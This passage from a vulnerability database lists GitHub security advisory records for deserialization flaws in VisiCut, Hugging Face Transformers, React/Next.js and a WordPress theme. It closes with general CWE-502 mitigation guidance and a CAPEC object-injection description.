"type": "WEB",
"url": "https://patchstack.com/database/wordpress/theme/zoya/vulnerability/wordpress-zoya-theme-1-4-php-object-injection-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-9QJM-V45H-7FXQ
Vulnerability from github – Published: 2025-03-10 18:31 – Updated: 2025-03-12 21:31VisiCut 2.1 allows code execution via Insecure XML Deserialization in the loadPlfFile method of VisicutModel.java.
{
"affected": [],
"aliases": [
"CVE-2025-25940"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-10T16:15:13Z",
"severity": "CRITICAL"
},
"details": "VisiCut 2.1 allows code execution via Insecure XML Deserialization in the loadPlfFile method of VisicutModel.java.",
"id": "GHSA-9qjm-v45h-7fxq",
"modified": "2025-03-12T21:31:28Z",
"published": "2025-03-10T18:31:56Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25940"
},
{
"type": "WEB",
"url": "https://github.com/t-oster/VisiCut"
},
{
"type": "WEB",
"url": "https://royblume.github.io/CVE-2025-25940"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-9QM5-HQG9-J2FX
Vulnerability from github – Published: 2025-12-23 21:30 – Updated: 2025-12-23 21:30Hugging Face Transformers GLM4 Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
The specific flaw exists within the parsing of weights. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28309.
{
"affected": [],
"aliases": [
"CVE-2025-14930"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-12-23T21:15:48Z",
"severity": "HIGH"
},
"details": "Hugging Face Transformers GLM4 Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of weights. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28309.",
"id": "GHSA-9qm5-hqg9-j2fx",
"modified": "2025-12-23T21:30:29Z",
"published": "2025-12-23T21:30:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14930"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1145"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-9QR9-H5GF-34MP
Vulnerability from github – Published: 2025-12-03 19:07 – Updated: 2025-12-11 19:31A vulnerability affects certain React packages1 for versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as CVE-2025-55182.
Fixed in: React: 19.0.1, 19.1.2, 19.2.1 Next.js: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7, 15.6.0-canary.58, 16.1.0-canary.12+
The vulnerability also affects experimental canary releases starting with 14.3.0-canary.77. Users on any of the 14.3 canary builds should either downgrade to a 14.x stable release or 14.3.0-canary.76.
All users of stable 15.x or 16.x Next.js versions should upgrade to a patched, stable version immediately.
1 The affected React packages are: - react-server-dom-parcel - react-server-dom-turbopack - react-server-dom-webpack
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "next"
},
"ranges": [
{
"events": [
{
"introduced": "14.3.0-canary.77"
},
{
"fixed": "15.0.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "next"
},
"ranges": [
{
"events": [
{
"introduced": "15.1.0-canary.0"
},
{
"fixed": "15.1.9"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "next"
},
"ranges": [
{
"events": [
{
"introduced": "15.2.0-canary.0"
},
{
"fixed": "15.2.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "next"
},
"ranges": [
{
"events": [
{
"introduced": "15.3.0-canary.0"
},
{
"fixed": "15.3.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "next"
},
"ranges": [
{
"events": [
{
"introduced": "15.4.0-canary.0"
},
{
"fixed": "15.4.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "next"
},
"ranges": [
{
"events": [
{
"introduced": "15.5.0-canary.0"
},
{
"fixed": "15.5.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "next"
},
"ranges": [
{
"events": [
{
"introduced": "16.0.0-canary.0"
},
{
"fixed": "16.0.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-03T19:07:11Z",
"nvd_published_at": "2025-12-03T18:15:47Z",
"severity": "CRITICAL"
},
"details": "A vulnerability affects certain React packages\u003csup\u003e1\u003c/sup\u003e for versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as [CVE-2025-55182](https://www.cve.org/CVERecord?id=CVE-2025-55182). \n\nFixed in:\nReact: 19.0.1, 19.1.2, 19.2.1\nNext.js: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7, 15.6.0-canary.58, 16.1.0-canary.12+\n\nThe vulnerability also affects experimental canary releases starting with 14.3.0-canary.77. Users on any of the 14.3 canary builds should either downgrade to a 14.x stable release or 14.3.0-canary.76.\n\nAll users of stable 15.x or 16.x Next.js versions should upgrade to a patched, stable version immediately.\n\n\u003csup\u003e1\u003c/sup\u003e The affected React packages are:\n- react-server-dom-parcel\n- react-server-dom-turbopack\n- react-server-dom-webpack",
"id": "GHSA-9qr9-h5gf-34mp",
"modified": "2025-12-11T19:31:04Z",
"published": "2025-12-03T19:07:11Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/facebook/react/security/advisories/GHSA-fv66-9v8q-g76r"
},
{
"type": "WEB",
"url": "https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp"
},
{
"type": "WEB",
"url": "https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-fmh4-wr37-44fp"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55182"
},
{
"type": "PACKAGE",
"url": "https://github.com/vercel/next.js"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Next.js is vulnerable to RCE in React flight protocol"
}
Mitigation
If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.
Mitigation
When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe.
Mitigation
Explicitly define a final object() to prevent deserialization.
Mitigation
- Make fields transient to protect them from deserialization.
- An attempt to serialize and then deserialize a class containing transient fields will result in NULLs where the transient data should be. This is an excellent way to prevent time, environment-based, or sensitive variables from being carried over and used improperly.
Mitigation
Avoid having unnecessary types or gadgets (a sequence of instances and method invocations that can self-execute during the deserialization process, often found in libraries) available that can be leveraged for malicious ends. This limits the potential for unintended or unauthorized types and gadgets to be leveraged by the attacker. Add only acceptable classes to an allowlist. Note: new gadgets are constantly being discovered, so this alone is not a sufficient mitigation.
Mitigation
Employ cryptography of the data or code for protection. However, it's important to note that it would still be client-side security. This is risky because if the client is compromised then the security implemented on the client (the cryptography) can be bypassed.
Mitigation MIT-29
Strategy: Firewall
Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].
CAPEC-586: Object Injection
An adversary attempts to exploit an application by injecting additional, malicious content during its processing of serialized objects. Developers leverage serialization in order to convert data or state into a static, binary format for saving to disk or transferring over a network. These objects are then deserialized when needed to recover the data/state. By injecting a malformed object into a vulnerable application, an adversary can potentially compromise the application by manipulating the deserialization process. This can result in a number of unwanted outcomes, including remote code execution.